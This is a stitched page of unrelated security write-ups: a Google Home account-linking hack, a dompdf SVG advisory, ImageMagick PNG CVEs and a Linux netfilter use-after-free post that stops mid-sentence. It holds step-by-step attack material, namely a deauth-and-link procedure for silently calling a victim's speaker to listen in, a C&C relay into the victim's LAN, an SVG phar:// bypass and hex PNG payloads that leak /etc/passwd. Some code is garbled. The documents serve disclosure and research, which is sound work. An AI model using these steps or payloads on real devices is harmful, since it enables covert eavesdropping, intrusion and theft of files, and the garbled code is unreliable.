CDP uses WebSockets, which can be accessed through the standard JS API. The same-origin policy doesn’t apply to WebSockets, so we can easily initiate a WebSocket to 

localhost
 from our local home app (hosted on some public website) without any problems, as long as we have the correct URL. Because CDP access could lead to trivial RCE on the desktop version of Chrome, the WebSocket address is randomly generated each time debugging is enabled, to prevent random websites from connecting. The address can be retrieved through a GET request to 
http://[CDP host]:9222/json
. This is normally protected by the same-origin policy, so we can’t just use an XHR request, but since we have full access to 
localhost
 through the Local Home SDK, we can use that to make the request. Once we have the address, we can use the JS 
WebSocket()
 constructor to connect.

Through CDP, we can send arbitrary HTTP requests within the victim’s LAN, which opens up the victim’s other devices for attack. As I describe later, I also found a way to read and write arbitrary files on the device using CDP.

PoCs

The following PoCs have been published here: https://github.com/DownrightNifty/gh_hack_PoC

Since the security issues have been fixed, none of these probably work anymore, but I thought they were worth documenting/preserving.

PoC #1: Spy on victim

I made a PoC that works on my Android phone (via Python on Termux) to demonstrate how quick and easy the process of linking an account could be. The attack described here could be performed within the span of a few minutes.

For the PoC, I re-implemented the device link and routines APIs in Python, and made the following utilities: 

google_login.py
link_device.py
reset_volume.py
call_device.py
.

  1. Download protoc and add it to your PATH
  2. Install the requirements: 
    pip3 install requests==2.23.0 gpsoauth httpx[http2]
  3. Create the “attacker” Google account
  4. Log in with 
    python3 google_login.py
  5. Get within wireless proximity of Google Home
  6. Deauth the Google Home
    • Raw packet injection (required for deauth attacks) requires a rooted phone and won’t work on some Wi-Fi chips. I ended up using a NodeMCU, a tiny Wi-Fi development board, going for less than $5 on Amazon, and flashed it with spacehuhn’s deauther firmware. You can use its web UI to scan for nearby devices and deauth them. It quickly found my Google Home (manufacturer listed as “Google” based on MAC address prefix) and I was able to deauth it.
  7. Connect to the Google Home’s setup network (named 
    [device name].o
    )
  8. Run 
    python3 link_device.py --setup_mode 192.168.255.249
     to link your account to the device
    • In addition to linking your account, to make the attack as stealthy as possible, “night mode” is also enabled on the device, which decreases the maximum volume and LED brightness. Since music volume is unaffected, and the volume decrease is almost entirely suppressed when the volume is greater than 50%, this subtle change is unlikely to be noticed by the victim. However, it makes it so that, at 0% volume, the Assistant voice is completely muted (whereas with night mode off, it can barely still be heard at 0%).
  9. Stop the deauth attack and wait for the device to re-connect to the Internet
    • You can run 
      python3 reset_volume.py 4
       to reset the volume to 40% (since enabling night mode set it to 0%).
  10. Now that your account is linked, you can make the device call your phone number, silently, at any time, over the Internet, allowing you to listen in to the microphone feed.
    • To issue a call, run 
      python3 call_device.py [phone number]
      .
    • The commands “set the volume to 0” and “call [number]” are executed on the device remotely using a routine.
    • The only thing the victim may notice is that the device’s LEDs turn solid blue, but they’d probably just assume it’s updating the firmware or something. In fact, the official support page describing what the LED colors meanonly says solid blue means “Your speaker needs to be verified by you” and makes no mention of calling. During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open.

Here’s a video demonstrating what it looks like when a call is initiated remotely:

As you can see, there is no audible indication that the commands are running, which makes it difficult for the victim to notice. The victim can still use their device normally for the most part (although certain commands, like music playback, don’t work during a call).

PoC #2: Make arbitrary HTTP requests on victim’s network

As I described earlier, the attacker can install a smart home action onto the linked device remotely, and leverage the Local Home SDK to make arbitrary HTTP requests within the victim’s LAN. 

c2.py
 is the command & control server. 
app.js
 and 
index.html
 are the local home app.

  1. Configure and start the C&C server:
    • Install the requirements: 
      pip3 install mitmproxy websockets
    • Start the server: 
      mitmdump --listen-port 8000 --set upstream_cert=false --ssl-insecure -s c2.py
      • Under the default configuration, a proxy server starts on 
        localhost:8000
        , and a WebSocket server starts on 
        0.0.0.0:9000
        . The proxy server acts as a relay, sending requests from programs on your computer (like 
        curl
        ) to the victim’s Google Home through the WebSocket. In a real attack, the WebSocket port would need to be exposed to the Internet so the victim’s Google Home could connect to it, but for local demonstration, it doesn’t have to be.
  2. Configure the local home app:
    • Change the 
      C2_WS_URL
       variable at the top of 
      app.js
       to the WebSocket URL for your C&C server. This needs to be reachable by the Google Home.
    • Host the static 
      index.html
       and 
      app.js
       files somewhere reachable by the Google Home. For local demonstration, you can spin up a simple file hosting server using 
      python3 -m http.server
      .
  3. Deploy the local home app to your account:
npm run firebase --prefix functions/ -- functions:config:set \
    strand1.leds=16 strand1.channel=1 \
    strand1.control_protocol=HTTP
npm run deploy --prefix functions/
    • This tells the cloud fulfillment to include an 
      otherDeviceIds
       field in responses to 
      SYNC
       requests. As far as I understand, this is all that’s required to activate local fulfillment; the specific device IDs or attributes you choose don’t matter.
  1. Get within wireless proximity of the victim’s Google Home, then force it into setup mode, and link your account using the  
    link_device.py
     script from PoC #1.
  2. Reboot the device:
    • While still connected to the device’s setup network, send a POST request to the 
      /reboot
       endpoint with the body 
      {"params":"now"}
       and a 
      cast-local-authorization-token
       header (obtained with 
      HomeGraphAPI.get_local_auth_tokens()
       from 
      googleapi.py
      ).
    • For local demonstration, you can just unplug the Google Home then plug it back in.
  3. Not long after the reboot, the Google Home automatically downloads your local home app and runs it.
    • The app waits for the 
      IDENTIFY
       request it receives when the Google Home finds itself through mDNS scanning, then connects to the Chrome DevTools Protocol WebSocket on port 9222. After connecting to CDP, it opens a WebSocket to your C&C server, and waits for commands. If disconnected from either CDP or the C&C server, it automatically tries to reconnect every 5 seconds.
    • Once loaded, it seems to run indefinitely. The documentation says apps may be killed if they consume too much memory, but I haven’t run into this, and I’ve even left my app running overnight. If the Google Home is rebooted, the app will reload.

Now, you can send HTTP(S) requests on the victim’s private LAN, as if you had the WiFi password, even though you don’t (yet), by configuring a program on your computer to route its traffic through the local proxy server, which in turn routes it to the Google Home. For example, 

curl --proxy 'localhost:8000' --insecure -v https://localhost:8443/setup/eureka_info
 returns the Google Home’s info, because through the proxy, 
localhost
 resolves to the Google Home’s IP. The JSON response to 
/setup/eureka_info
 contains the IP, which is helpful for determining the layout of the LAN.

I was even able to route Chrome through the proxy, with 

chrome --proxy-server='localhost:8000' --ignore-certificate-errors --user-data-dir='SOME_DIR'
, and it worked surprisingly well.

Obviously, the ability to send requests on the private LAN opens a large attack surface. Using the IP of the Google Home, you can determine the subnet that the victim’s other devices are on. For example, my Google Home’s IP is 

192.168.86.132
, so I could guess that my other devices are in the  
192.168.86.0
 to 
192.168.86.255
 range. You could write a simple script to 
curl
 every possible address, looking for devices on the LAN to attack or steal data from. Since it only takes a few seconds to check each IP, it would only take around 10 minutes to try every one. On my LAN, I found my printer’s web interface at 
http://192.168.86.33
. Its network settings page contains an 
&lt;input type="password"&gt;
 pre-filled with my WiFi password in plaintext. It also provides a firmware update mechanism, which I imagine could be vulnerable to attack.

Another approach would be looking for the victim’s router and trying to attack that. My router’s IP, 

192.168.1.254
, shows up among the first results when you Google “default router IPs”. You could write a script to try these. My router’s configuration interface also immediately returns my WiFi password in plaintext. Luckily, I’ve changed the default admin password, so at the very least an attacker with access to it wouldn’t be able to modify the settings, but most people don’t change this password, so you could find it by searching for “[brand name] router password”, then set the DNS server to your own, install malicious firmware updates, etc. Even if the victim changed their router’s password, it may still be vulnerable. For example, in June 2020, a researcher found a buffer overflow vulnerability in the web interface on 79 Netgear router models that led to a root shell, and described the process as “easy”.

PoC #3: Read/write arbitrary files on device

I also found a way to read/write arbitrary files on the linked device using the 

DOM.setFileInputFiles
 and 
Page.setDownloadBehavior
 methods of the Chrome DevTools Protocol.

The following reproduction steps first write a file, 

/tmp/example_file.txt
, then read it back to verify that it worked.

  1. Enable remote debugging on the Google Home:
  2. Install the requirements:
npm install ws
pip install flask
  1. Create an 
    example_file.txt
    , e.g. 
    echo 'test' &gt; example_file.txt
  2. Run 
    python3 write_server.py example_file.txt
    . You can optionally modify the 
    HOST
     or 
    PORT
     variables at the top of the script. Get the URL of the server, like 
    http://[IP]:[port]
    . This must be reachable by the Google Home.
  3. Run 
    node write.js [Google Home IP] [write server URL] /tmp
    , inserting the appropriate values. You can get the Google Home’s IP from the Google Home app. The file will be written to 
    /tmp/example_file.txt
    .
  4. Run 
    python3 read_server.py
    . You can modify the host/port like before.
  5. Run 
    node read.js [Google Home IP] [read server URL]
    . When prompted for a file path to read, enter 
    /tmp/example_file.txt
    .
  6. Verify that 
    example_file.txt
     was dumped from the device to 
    dumped_files/example_file.txt

Since I couldn’t explore the filesystem of my Google Home (and 

&lt;input type="file" webkitdirectory&gt;
 didn’t work to upload folders instead of files), I’m not sure exactly what the impact of this was. I was able to find some info about the filesystem structure from the “open source licenses” info, and from the DEFCON talk on the Google Home. I dumped a few binaries like 
/system/chrome/cast_shell
 and 
/system/chrome/lib/libassistant.so
, then ran 
strings
 on them, looking for interesting files to steal or tamper with. It looks like 
/data/chrome/chirp/assistant/cookie
 may contain user info? 
/data/chrome/chirp/assistant/settings
and 
/data/chrome/chirp/assistant/phenotype_package_store
 both contain the GAIA IDs of the accounts linked to my Google Home. I was able to dump 
/data/chrome/chirp/assistant/nightmode/nightmode_params
, hex edit it, and overwrite the original with my modified version, and the changes were applied after a reboot. If, for example, a bug in a config file parser was found, I imagine that this could have potentially led to RCE?

The fixes

I’m aware of the following fixes deployed by Google:

  • You must request an invite to the “Home” that the device is registered to in order to link your account to it through the 
    /deviceuserlinksbatch
     API. If you’re not added to the Home but you try to link your account this way, you’ll get a 
    PERMISSION_DENIED
     error.
  • “Call [phone number]” commands can’t be initiated remotely through routines.

You can still deauth the Google Home and access its device info through the 

/setup/eureka_info
 endpoint, but you can’t use it to link your account anymore, and you can’t access the rest of the local API (because you can’t get a local auth token).

On devices with a display (e.g. Google Nest Hub), the setup network is protected with a WPA2 password which appears as a QR code on the display (scanned with the Google Home app), which adds an additional layer of protection.

Additionally, on these devices, you can say “add my voice” to bring up a screen with a link code instructing you to visit https://g.co/nest/voice. You can link your account to the device through this website, even if you aren’t added to its Home (which is fine, because this still requires physical access to the device). The “add my voice” command doesn’t appear to work on the Google Home Mini, probably since it doesn’t have a display that it can use to provide a link code. I guess if Google wanted to implement this, they could make it speak the link code out loud or text it to a provided phone number or something.

Reflection/conclusions

Google Home’s architecture is based on Chromecast. Chromecast doesn’t place much emphasis on security against proximity-based attacks because it’s mostly unnecessary. What’s the worst that could happen if someone hacks your Chromecast? Maybe they could play obscene videos? However, the Google Home is a much more security-critical device, due to the fact that it has control over your other smart home devices, and a microphone. If the Google Home architecture had been built from scratch, I imagine that these issues would have never existed.

Ever since the first Google Home device released in November 2016, Google continued to add more and more features to the device’s cloud APIs as time went on, like scheduled routines (July 2018) and the Local Home SDK (April 2020). I’m guessing that the engineers behind these features were under the assumption that the account linking process was secure.

Many other security researchers had already given the Google Home a look before me, but somehow it appears that none of them noticed these seemingly glaring issues. I guess they were mainly focused on the endpoints that the local API exposed and what an attacker could do with those. However, these endpoints only allow for adjusting a few basic device settings, and not much else. While the issues I discovered may seem obvious in hindsight, I think that they were actually pretty subtle. Rather than making a local API request to control the device, you instead make a local API request to retrieve innocuous-looking device info, and use that info along with cloud APIs to control the device.

As the DEFCON talk shows, the low-level security of the device is generally pretty good, and buffer overflows and such are hard to come by. The issues I found were lurking at the high level.

Many thanks to Google for the incredibly generous rewards!

Disclosure timeline

  • 01/08/2021: Reported
  • 01/10/2021: Triaged
  • 01/20/2021: Closed (Intended Behavior)
  • I was busy with school stuff, so it took me a while to respond
  • 03/11/2021: Sent additional details and PoC
  • 03/19/2021: Reopened
  • 04/07/2021: Sent additional details
  • 04/20/2021: Reward received
  • 04/05/2022: Google announced increased rewards for Google Nest and Fitbit devices
  • 05/04/2022: Bonus rewards received

Prior research

Here are some articles I found during my research on Google Home devices that I thought were interesting:

Footnote: Static analysis of Google Home app

During my research, I did a little digging within the Google Home app. I didn’t find any security issues here, but I did discover some things about the local API that the unofficial docs don’t yet include.

show_led
 endpoint

To find a list of local API endpoints (and potentially some undocumented ones), I searched for a known endpoint (

get_app_device_id
) in the decompiled sources:

The information I was looking for was in 

defpackage/ufo.java
:

SHOW_LED
 sounded interesting, and it wasn’t in the unofficial docs. Searching for where this constant is used led me to 
StereoPairCreationActivity
:

With the help of JADX’s amazing “rename symbol” feature, and after renaming some methods, I was able to find the class responsible for constructing the JSON payload for this endpoint:

Looks like the payload consists of an integer 

animation_id
. We can send use the endpoint like so:

$ curl --insecure -X POST -H 'cast-local-authorization-token: [token]' -H 'Content-Type: application/json' -d '{"animation_id":2}' https://[Google Home IP]:8443/setup/assistant/show_led

This makes the LEDs play a slow pulsing animation. Unfortunately it seems that there are only two animations: 

1
(reset LEDs to normal) and 
2
 (continuous pulsing). Oh, well.

Wi-Fi password encryption

I was also able to find the algorithm used to encrypt the user’s Wi-Fi password before sending it through the 

/setup/connect_wifi
 endpoint. Now that HTTPS is used, this encryption seems redundant, but I imagine that this was originally implemented to protect against MITM attacks exposing the Wi-Fi password. Anyway, we see that the password is encrypted using RSA PKCS1 and the device’s public key (from 
/setup/eureka_info
):

Footnote: Deauth attacks on Google Home Mini

I mentioned above that the Google Home Mini doesn’t support WPA3, nor 802.11w. I’d like to clarify how I discovered this.

Since my router doesn’t support these, I borrowed a friend’s router running OpenWrt, a FOSS operating system for routers, which does support 802.11w and WPA3.

There are three 802.11w modes you can choose from: disabled (default), optional, and required. (“Optional” means that it’s used only for devices that support it.) While I was using “required”, my Google Home Mini was unable to connect, meanwhile my Pixel 5 (Android 12) and MacBook Pro (macOS 12.4) had no issues. Same results when I enabled WPA3. I tried “optional” and the Google Home Mini connected, but was still vulnerable to deauth attacks (as expected).

I tested this on the latest Google Home Mini firmware at the time of writing (1.56.309385, August 2022), on 1st gen (codename 

mushroom
) hardware. I’m assuming this is a limitation of the Wi-Fi chip that it uses, rather than a software issue.

Dompdf vulnerable to URI validation failure on SVG parsing

Original text by Blaklis

Summary

The URI validation on dompdf 2.0.1 can be bypassed on SVG parsing by passing 

&lt;image&gt;
 tags with uppercase letters. This might leads to arbitrary object unserialize on PHP < 8, through the 
phar
 URL wrapper.

Details

The bug occurs during SVG parsing of 

&lt;image&gt;
 tags, in src/Image/Cache.php :

if ($type === "svg") {
    $parser = xml_parser_create("utf-8");
    xml_parser_set_option($parser, XML_OPTION_CASE_FOLDING, false);
    xml_set_element_handler(
        $parser,
        function ($parser, $name, $attributes) use ($options, $parsed_url, $full_url) {
            if ($name === "image") {
                $attributes = array_change_key_case($attributes, CASE_LOWER);

This part will try to detect 

&lt;image&gt;
 tags in SVG, and will take the href to validate it against the protocolAllowed whitelist. However, the `$name comparison with «image» is case sensitive, which means that such a tag in the SVG will pass :

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

As the tag is named «Image» and not «image», it will not pass the condition to trigger the check.

A correct solution would be to strtolower the 

$name
 before the check :

if (strtolower($name) === "image") {

PoC

Parsing the following SVG file is sufficient to reproduce the vulnerability :

<svg>
    <Image xlink:href="phar:///foo"></Image>
</svg>

Impact

An attacker might be able to exploit the vulnerability to call arbitrary URL with arbitrary protocols, if they can provide a SVG file to dompdf. In PHP versions before 8.0.0, it leads to arbitrary unserialize, that will leads at the very least to an arbitrary file deletion, and might leads to remote code execution, depending on classes that are available.

References

ImageMagick: The hidden vulnerability behind your online images

ImageMagick: The hidden vulnerability behind your online images

Original text byMetabase Q Team By Bryan Gonzalez from Ocelot Team

Introduction

ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats and, therefore, is very common to find it in websites worldwide since there is always a need to process pictures for users’ profiles, catalogs, etc.

In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images in a Drupal-based website, and hence, the team decided to try to find new vulnerabilities in this component, proceeding to download the latest version of ImageMagick, 7.1.0-49 at that time. As a result, two zero days were identified:

  • CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
  • CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).

How to trigger the exploitation?

An attacker needs to upload a malicious image to a website using ImageMagick, in order to exploit the above mentioned vulnerabilities remotely.

The Ocelot team is very grateful for the team of volunteers of ImageMagick, who validated and released the patches needed in a timely manner:

https://github.com/ImageMagick/ImageMagick/commit/05673e63c919e61ffa1107804d1138c46547a475

In this blog, the technical details of the vulnerabilities are explained.

CVE-2022-44267: Denial of service

ImageMagick:  7.1.0-49

When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process could be left waiting for stdin input leading to a Denial of Service since the process won’t be able to process other images.

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile. If the specified filename is “-“ (a single dash) ImageMagick will try to read the content from standard input potentially leaving the process waiting forever.

Exploitation Path Execution:

  • Upload image to trigger ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164)
Reading “tEXt” chunk:

SetImageProfile (MagickCore/property.c:4360):
Checking if keyword equals to “profile”:
Copying the text string as filename in line 4720 and saving the content in line 4722:
FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):
const size_t extent, ExceptionInfo *exception)
{
StringInfo
*string_info;
assert(filename != (const char *) NULL);
assert(exception != (ExceptionInfo *) NULL);
if (IsEventLogging () != MagickFalse)
(void) LogMagickEvent (TraceEvent, GetMagickModule (), "%s", filename);
string_info=AcquireStringInfoContainer();
string_info-›path=ConstantString(filename);
string_info-›datum=(unsigned char *) FileToBlob(filename, extent,
&string_info-›length,exception);
if (string_info-›datum == (unsigned char *) NULL)
{
string_info=DestroyStringInfo(string_info);
return ((StringInfo *) NULL);
return(string_info);
}

FileToBlob (MagickCore/blob.c:1396): Assigning stdin to a filename as “-”, causing the process to wait for input forever:

file=fileno(stdin);
if (LocaleCompare(filename, " -") ! = 0)
{
status=GetPathAttributes (filename, &attributes) ;
if ((status == MagickFalse) || (S_ISDIR(attributes.st_mode) != 0))
{
ThrowFileException(exception, BlobError, "UnableToReadBlob" ,filename);
return (NULL);
?
file=open_utf8 (filename, O_RDONLY | O_BINARY, 0);
}
if (file == -1)
{
ThrovFileException(exception, BlobError, "UnableTo0penFile", filename);
return (NULL);
}
offset=(MagickOffsetType) Iseek(file, O, SEEK_END);
count=0;
if ((file == fileno (stdin)) (offset < 0)
(offset != (MagickOffsetType) ((ssize_t) offset)))
{
size t
quantum;
struct stat
file stats;
/*
Stream is not seekable.
* /
offset= (MagickOffsetType) Iseek(file,O, SEEK_SET);
quantum= (size t) MagickMaxBufferExtent;
if ((fstat (file, &file_stats) == 0) && (file_stats.st_size > 0))
quantum= (size_t) MagickMin(file stats.st_ size,MagickMaxBufferExtent);
blob=(unsigned char *) AcquireQuantumMemory (quantum, sizeof (*blob));
for (i=0; blob != (unsigned char *) NULL; i+=count)
{
count=read(file, blob+i, quantum);

PoC: Malicious PNG File:

89504E470D0A1A0A0000000D49484452000000010000000108000000003A7E9B550000000B49444154789C63F8FF1F00030001FFFC25DC510000000A7445587470726F66696C65002D00600C56A10000000049454E44AE426082

Evidence: Malicious image file: OCELOT_output.png

Stdin input waiting forever:

CVE-2022-44268: Arbitrary Remote Leak

ImageMagick:  7.1.0-49

When ImageMagick parses the PNG file, for example in a resize operation, the resulting image could have embedded the content of an arbitrary remote file from the website (if magick binary has permissions to read it).

A malicious actor could craft a PNG or use an existing one and add a textual chunk type (e.g., tEXt). These types have a keyword and a text string. If the keyword is the string “profile” (without quotes) then ImageMagick will interpret the text string as a filename and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.

Exploitation Path Execution:

  • Upload image to trigger ImageMagick command, like “convert”
  • ReadOnePNGImage (coders/png.c:2164):

– Reading tEXt chunk:

SetImageProfile (MagickCore/property.c:4360)

Checking if keyword equals to “profile”

Copying the text string as filename in line 4720 and saving the content in line 4722:

FileToStringInfo to store the content into string_info->datum, (MagickCore/string.c:1005):

If a valid (and accessible) filename is provided, the content will be returned to the caller function (FileToStringInfo) and the StringInfo object will return to the SetImageProperty function, saving the blob into the new image generated, thanks to the function SetImageProfile:

This new image will be available to download by the attackers with the arbitrary website file content embedded inside.

PoC: Malicious PNG content to leak “/etc/passwd” file:

89504E470D0A1A0A0000000D4948445200000001000000010100000000376EF9240000000A49444154789C636800000082008177CD72B6000000147445587470726F66696C65002F6574632F70617373776400B7F46D9C0000000049454E44AE426082

Evidence:

Content of the /etc/passwd stored in the image via profile->datum variable:

Hexadecimal representation of the /etc/passwd content, extracted from the image:

Content from /etc/passwd in the website, received in the image generated:

Video showing the exploitation:

Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg

Original text by Sergi Martinez

Overview

It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the 

kmalloc-cg
 series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.

The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux Kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targetting the Linux Kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.

The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the 

GFP_KERNEL
 flag or the 
GFP_KERNEL_ACCOUNT
 flag are served by the 
kmalloc-*
 slab caches. In version 5.15, allocations performed with the 
GFP_KERNEL_ACCOUNT
 flag are served by the 
kmalloc-cg-*
 slab caches. While in both 5.13 and 5.15 the affected object, 
nft_expr,
 is allocated using 
GFP_KERNEL,&nbsp;
the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (
struct msg_msg)
, is served from 
kmalloc-*
 in 5.13 but from 
kmalloc-cg-*
 in 5.15. Therefore, in 5.15, 
struct msg_msg
 cannot be used to exploit this vulnerability.

In 5.18.1, the object involved in the use-after-free vulnerability, 

nft_expr,&nbsp;
is itself allocated with 
GFP_KERNEL_ACCOUNT
 in the 
kmalloc-cg-*
 slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with  
GFP_KERNEL,&nbsp;
they do not work against the latest vulnerable version of the Linux kernel.

The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.

Vulnerability

Netfilter sets can be created with a maximum of two associated expressions that have the 

NFT_EXPR_STATEFUL
 flag. The vulnerability occurs when a set is created with an associated expression that does not have the 
NFT_EXPR_STATEFUL
 flag, such as the 
dynset
 and 
lookup
 expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.

During the allocation of the associated 

dynset
 or 
lookup
 expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the 
NFT_EXPR_STATEFUL
 flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.

Exploitation

Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability: 

nft_set
nft_expr
nft_lookup
, and 
nft_dynset
.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L502

struct nft_set {
        struct list_head           list;                 /*     0    16 */
        struct list_head           bindings;             /*    16    16 */
        struct nft_table *         table;                /*    32     8 */
        possible_net_t             net;                  /*    40     8 */
        char *                     name;                 /*    48     8 */
        u64                        handle;               /*    56     8 */
        /* --- cacheline 1 boundary (64 bytes) --- */
        u32                        ktype;                /*    64     4 */
        u32                        dtype;                /*    68     4 */
        u32                        objtype;              /*    72     4 */
        u32                        size;                 /*    76     4 */
        u8                         field_len[16];        /*    80    16 */
        u8                         field_count;          /*    96     1 */

        /* XXX 3 bytes hole, try to pack */

        u32                        use;                  /*   100     4 */
        atomic_t                   nelems;               /*   104     4 */
        u32                        ndeact;               /*   108     4 */
        u64                        timeout;              /*   112     8 */
        u32                        gc_int;               /*   120     4 */
        u16                        policy;               /*   124     2 */
        u16                        udlen;                /*   126     2 */
        /* --- cacheline 2 boundary (128 bytes) --- */
        unsigned char *            udata;                /*   128     8 */

        /* XXX 56 bytes hole, try to pack */

        /* --- cacheline 3 boundary (192 bytes) --- */
        const struct nft_set_ops  * ops __attribute__((__aligned__(64))); /*   192     8 */
        u16                        flags:14;             /*   200: 0  2 */
        u16                        genmask:2;            /*   200:14  2 */
        u8                         klen;                 /*   202     1 */
        u8                         dlen;                 /*   203     1 */
        u8                         num_exprs;            /*   204     1 */

        /* XXX 3 bytes hole, try to pack */

        struct nft_expr *          exprs[2];             /*   208    16 */
        struct list_head           catchall_list;        /*   224    16 */
        unsigned char              data[] __attribute__((__aligned__(8))); /*   240     0 */

        /* size: 256, cachelines: 4, members: 29 */
        /* sum members: 176, holes: 3, sum holes: 62 */
        /* sum bitfield members: 16 bits (2 bytes) */
        /* padding: 16 */
        /* forced alignments: 2, forced holes: 1, sum forced holes: 56 */
} __attribute__((__aligned__(64)));

The 

nft_set
 structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L347

/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */
struct nft_expr {
	const struct nft_expr_ops	*ops;
	unsigned char			data[]
		__attribute__((aligned(__alignof__(u64))));
};

The 

nft_expr
 structure is a generic container for expressions. The specific expression data is stored within its 
data
 member. For this particular vulnerability the relevant expressions are 
nft_lookup
 and 
nft_dynset
, which are used to perform lookups on sets or update dynamic sets respectively.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_lookup.c#L18

struct nft_lookup {
        struct nft_set *           set;                  /*     0     8 */
        u8                         sreg;                 /*     8     1 */
        u8                         dreg;                 /*     9     1 */
        bool                       invert;               /*    10     1 */

        /* XXX 5 bytes hole, try to pack */

        struct nft_set_binding     binding;              /*    16    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 48, cachelines: 1, members: 5 */
        /* sum members: 43, holes: 1, sum holes: 5 */
        /* paddings: 1, sum paddings: 4 */
        /* last cacheline: 48 bytes */
};

nft_lookup
 expressions have to be bound to a given set on which the lookup operations are performed.

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/net/netfilter/nft_dynset.c#L15

struct nft_dynset {
        struct nft_set *           set;                  /*     0     8 */
        struct nft_set_ext_tmpl    tmpl;                 /*     8    12 */

        /* XXX last struct has 1 byte of padding */

        enum nft_dynset_ops        op:8;                 /*    20: 0  4 */

        /* Bitfield combined with next fields */

        u8                         sreg_key;             /*    21     1 */
        u8                         sreg_data;            /*    22     1 */
        bool                       invert;               /*    23     1 */
        bool                       expr;                 /*    24     1 */
        u8                         num_exprs;            /*    25     1 */

        /* XXX 6 bytes hole, try to pack */

        u64                        timeout;              /*    32     8 */
        struct nft_expr *          expr_array[2];        /*    40    16 */
        struct nft_set_binding     binding;              /*    56    32 */

        /* XXX last struct has 4 bytes of padding */

        /* size: 88, cachelines: 2, members: 11 */
        /* sum members: 81, holes: 1, sum holes: 6 */
        /* sum bitfield members: 8 bits (1 bytes) */
        /* paddings: 2, sum paddings: 5 */
        /* last cacheline: 24 bytes */
};

nft_dynset
 expressions have to be bound to a given set on which the add, delete, or update operations will be performed.

When a given 

nft_set
 has expressions bound to it, they are added to the 
nft_set.bindings
 double linked list. A visual representation of an 
nft_set
 with 2 expressions is shown in the diagram below.

The 

binding
 member of the 
nft_lookup
 and 
nft_dynset
 expressions is defined as follows:

// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576

/**
 *	struct nft_set_binding - nf_tables set binding
 *
 *	@list: set bindings list node
 *	@chain: chain containing the rule bound to the set
 *	@flags: set action flags
 *
 *	A set binding contains all information necessary for validation
 *	of new elements added to a bound set.
 */
struct nft_set_binding {
	struct list_head		list;
	const struct nft_chain		*chain;
	u32				flags;
};

The important member in our case is the 

list
 member. It is of type 
struct list_head
, the same as the 
nft_lookup.binding
 and 
nft_dynset.binding
 members. These are the foundation for building a double linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented refer to this article.

With this information, let’s see what the vulnerability allows to do. Since the UAF occurs within a double linked list let’s review the common operations on them and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is build with the 

nft_set
 and the expressions that can be bound to it.

In the diagram shown above, the simplified pseudo-code for removing the 

nft_lookup
 expression from the list would be:

nft_lookup.binding.list->prev->next = nft_lookup.binding.list->next
nft_lookup.binding.list->next->prev = nft_lookup.binding.list->prev

This code effectively writes the address of 

nft_dynset.binding
 in 
nft_set.bindings.next
, and the address of 
nft_set.bindings
 in 
nft_dynset.binding.list-&gt;prev
. Since the 
binding
 member of 
nft_lookup
 and 
nft_dynset
 expressions are defined at different offsets, the write operation is done at different offsets.

With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:

  • nft_lookup
    : Write an 8-byte address at offset 24 (
    binding.list-&gt;next
    ) or offset 32 (
    binding.list-&gt;prev
    ) of a freed 
    nft_lookup
     object.
  • nft_dynset
    : Write an 8-byte address at offset 64 (
    binding.list-&gt;next
    ) or offset 72 (
    binding.list-&gt;prev
    ) of a freed 
    nft_dynset
